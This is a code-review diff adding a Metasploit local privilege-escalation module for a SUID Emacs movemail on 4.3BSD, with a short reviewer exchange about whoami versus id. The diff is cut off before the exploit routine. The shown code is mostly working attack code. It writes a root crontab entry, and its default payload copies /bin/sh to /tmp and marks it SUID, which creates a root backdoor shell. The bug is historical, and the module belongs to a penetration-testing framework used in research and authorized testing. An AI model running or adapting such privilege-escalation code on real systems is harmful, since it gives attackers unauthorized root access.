modules/exploits/unix/local/emacs_movemail.rb

```diff
@@ -0,0 +1,163 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Local
+
+  Rank = ExcellentRanking
+
+  include Msf::Post::File
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Emacs movemail Privilege Escalation',
+      'Description'    => %q{
+        This module exploits a SUID installation of the Emacs movemail utility
+        to run a command as root by writing to 4.3BSD's /usr/lib/crontab.local.
+        The vulnerability is documented in Cliff Stoll's book The Cuckoo's Egg.
+      },
+      'Author'         => [
+        'Markus Hess', # Discovery? atrun(8) exploit for sure
+        'Cliff Stoll', # The Cuckoo's Egg hacker tracker
+        'wvu'          # Module and additional research
+      ],
+      'References'     => [
+        %w[URL https://en.wikipedia.org/wiki/Movemail],
+        %w[URL https://en.wikipedia.org/wiki/The_Cuckoo%27s_Egg],
+        %w[URL http://pdf.textfiles.com/academics/wilyhacker.pdf],
+        %w[URL https://www.gnu.org/software/emacs/manual/html_node/efaq/Security-risks-with-Emacs.html],
+        %w[URL https://www.gnu.org/software/emacs/manual/html_node/emacs/Movemail.html],
+        %w[URL https://mailutils.org/manual/html_node/movemail.html]
+      ],
+      'DisclosureDate' => '1986-08-01', # Day unknown, assuming first of month
+      'License'        => MSF_LICENSE,
+      'Platform'       => 'unix',
+      'Arch'           => ARCH_CMD,
+      'SessionTypes'   => %w[shell],
+      'Privileged'     => true,
+      'Payload'        => {'BadChars' => "\n", 'Encoder' => 'generic/none'},
+      'Targets'        => [['/usr/lib/crontab.local', {}]],
+      'DefaultTarget'  => 0,
+      'DefaultOptions' => {
+        'PAYLOAD'      => 'cmd/unix/generic',
+        'CMD'          => 'cp /bin/sh /tmp && chmod u+s /tmp/sh'
+      }
+    ))
+
+    register_options([
+      OptString.new('MOVEMAIL', [true, 'Path to movemail', '/etc/movemail'])
+    ])
+
+    register_advanced_options([
+      OptBool.new('ForceExploit', [false, 'Override check result', false])
+    ])
+  end
+
+  def bin_path
+    '/bin:/usr/bin:/usr/ucb:/etc'
+  end
+
+  def movemail
+    datastore['MOVEMAIL']
+  end
+
+  def crontab_local
+    '/usr/lib/crontab.local'
+  end
+
+  def crontab(cmd)
+    "* * * * * root #{cmd}\n* * * * * root rm -f #{crontab_local}"
+  end
+
+  # uname(1) does not exist, technique from /etc/rc.local
+  def is_43bsd?
+    cmd_exec('strings /vmunix | grep UNIX').include?('4.3 BSD')
+  end
+
+  # id(1) does not exist
+  def is_root?
+    cmd_exec('whoami').include?('root')
```

Comment:
Would it be more accurate to use `cmd_exe('id -u') == "0"`? Not test. :)

Reply:
See the code comment. `id(1)` was not invented yet.